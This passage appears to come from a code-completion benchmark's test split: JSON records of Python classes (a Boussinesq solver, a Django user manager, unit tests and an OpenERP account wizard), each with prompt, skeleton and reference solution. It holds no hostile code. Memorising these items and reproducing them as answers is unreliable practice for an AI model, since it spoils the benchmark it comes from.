'x_bounds', 'z_bounds', 'order_upw', 'order', 'gmres_maxiter', 'gmres_restart', 'gmres_tol_limit']\n for key in essential_keys:\n if key not in problem_params:\n msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))\n raise ParameterError(msg)\n super(boussinesq_2d_imex, self).__init__((problem_params['nvars'], None, np.dtype('float64')), dtype_u, dtype_f, problem_params)\n self.N = [self.params.nvars[1], self.params.nvars[2]]\n self.bc_hor = [['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic'], ['periodic', 'periodic']]\n self.bc_ver = [['neumann', 'neumann'], ['dirichlet', 'dirichlet'], ['dirichlet', 'dirichlet'], ['neumann', 'neumann']]\n self.xx, self.zz, self.h = get2DMesh(self.N, self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n", "source": "the_stack_v2_python_sparse", "source_path": "pySDC/implementations/problem_classes/Boussinesq_2D_FD_imex.py", "source_repo": "ruthschoebel/pySDC", "split": "test", "star_events_count": 0} {"blob_id": "90bd4ac55df9cf4bc987abf706d68d2ce7c99b2e", "bodies": ["if not email:\n raise ValueError('Users must have an email address')\nuser = self.model(email=self.normalize_email(email), name=name)\nuser.set_password(password)\nuser.save(using=self._db)\nreturn user", "user = self.create_user(email, password=password, name=name)\nuser.is_admin = True\nuser.is_staff = True\nuser.save(using=self._db)\nreturn user"], "bodies_text": "<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserProfileManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000410", "length_bytes": 5621, "license_type": "no_license", "methods": [{"docstring": "创建普通用户 Creates and saves a User with the given email, date of birth and password.", "name": "create_user", "signature": "def create_user(self, email, name, password=None)"}, {"docstring": "创建超级用户 Creates and saves a superuser with the given email, date of birth and password.", "name": "create_superuser", "signature": "def create_superuser(self, email, name, password)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005962", "prompt": "Implement the Python class `UserProfileManager` described below.\n\nClass description:\nImplement the UserProfileManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, email, name, password=None): 创建普通用户 Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, email, name, password): 创建超级用户 Creates and saves a superuser with the given email, date of birth and password.", "prompted_full_text": "Implement the Python class `UserProfileManager` described below.\n\nClass description:\nImplement the UserProfileManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, email, name, password=None): 创建普通用户 Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, email, name, password): 创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\n\n<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "revision_id": "cc475863b0f6f574de79fc8d1fa91b9d0d5449d8", "skeleton": "<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserProfileManager:\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n", "source": "the_stack_v2_python_sparse", "source_path": "mgmt/models.py", "source_repo": "starjoe/PWM", "split": "test", "star_events_count": 0} {"blob_id": "a6db8d95776f07f9fa129ab238739577057429a4", "bodies": ["self.assertEqual(super_algos.find_min(''), -1)\nself.assertEqual(super_algos.sum_all([]), -1)\nself.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\nself.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\nself.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))", "self.assertEqual(super_algos.sum_all(''), -1)\nself.assertEqual(super_algos.sum_all([]), -1)\nself.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\nself.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\nself.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))", "self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\nself.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\nself.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\nself.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\nself.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\nself.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))"], "bodies_text": "<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "class_docstring": "", "class_name": "MyTestCases", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000411", "length_bytes": 1720, "license_type": "no_license", "methods": [{"docstring": "Test Function: * Tests if all instructions are followed for find_min(list)", "name": "test_find_min", "signature": "def test_find_min(self)"}, {"docstring": "Test Function: * Tests if all instructions are followed for sum_all(list)", "name": "test_sum_all", "signature": "def test_sum_all(self)"}, {"docstring": "Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)", "name": "test_possible_string", "signature": "def test_possible_string(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002600", "prompt": "Implement the Python class `MyTestCases` described below.\n\nClass description:\nImplement the MyTestCases class.\n\nMethod signatures and docstrings:\n- def test_find_min(self): Test Function: * Tests if all instructions are followed for find_min(list)\n- def test_sum_all(self): Test Function: * Tests if all instructions are followed for sum_all(list)\n- def test_possible_string(self): Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)", "prompted_full_text": "Implement the Python class `MyTestCases` described below.\n\nClass description:\nImplement the MyTestCases class.\n\nMethod signatures and docstrings:\n- def test_find_min(self): Test Function: * Tests if all instructions are followed for find_min(list)\n- def test_sum_all(self): Test Function: * Tests if all instructions are followed for sum_all(list)\n- def test_possible_string(self): Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\n\n<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "revision_id": "c27509693894b54c077bc40a4d4dfbfa311e029b", "skeleton": "<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyTestCases:\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n", "source": "the_stack_v2_python_sparse", "source_path": "python_projects/Recurrsion/submission_004-problem/test_algos.py", "source_repo": "Mbuso21/WeThinkCode-Projects", "split": "test", "star_events_count": 0} {"blob_id": "a0fbfd71c4c5e2facae06d5f226181f92e29c5dd", "bodies": ["output = []\naccounts = []\nfor x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\nreturn output", "if context is None:\n context = {}\ndata = self.read(cr, uid, ids, context=context)[0]\nobj_account = self.pool.get('account.account')\nchild_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\nconsild = []\nfor acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\nall_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\nif data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\nelse:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\nreturn {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}", "if context is None:\n context = {}\ndata = self.read(cr, uid, ids, context=context)[0]\nobj_account = self.pool.get('account.account')\nchart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\nconsoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\nfor acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\nreturn {}"], "bodies_text": "<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "class_docstring": "This model to update consolidation chart of account and validate the account not belong in consolidate accounts", "class_name": "account_tree", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000412", "length_bytes": 4112, "license_type": "no_license", "methods": [{"docstring": "Get account id from all charts of account @return: List of account ids", "name": "uniq", "signature": "def uniq(self, cr, uid, ids)"}, {"docstring": "Validate all accounts belong in consolidation account or not @return: dictionary of values", "name": "validate_move", "signature": "def validate_move(self, cr, uid, ids, context=None)"}, {"docstring": "Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values", "name": "update_consil", "signature": "def update_consil(self, cr, uid, ids, context=None)"}], "n_methods": 3, "prompt": "Implement the Python class `account_tree` described below.\n\nClass description:\nThis model to update consolidation chart of account and validate the account not belong in consolidate accounts\n\nMethod signatures and docstrings:\n- def uniq(self, cr, uid, ids): Get account id from all charts of account @return: List of account ids\n- def validate_move(self, cr, uid, ids, context=None): Validate all accounts belong in consolidation account or not @return: dictionary of values\n- def update_consil(self, cr, uid, ids, context=None): Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values", "prompted_full_text": "Implement the Python class `account_tree` described below.\n\nClass description:\nThis model to update consolidation chart of account and validate the account not belong in consolidate accounts\n\nMethod signatures and docstrings:\n- def uniq(self, cr, uid, ids): Get account id from all charts of account @return: List of account ids\n- def validate_move(self, cr, uid, ids, context=None): Validate all accounts belong in consolidation account or not @return: dictionary of values\n- def update_consil(self, cr, uid, ids, context=None): Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\n\n<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "revision_id": "0b997095c260d58b026440967fea3a202bef7efb", "skeleton": "<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n if context is None:\n context = {}\n data = self.read(cr, uid, 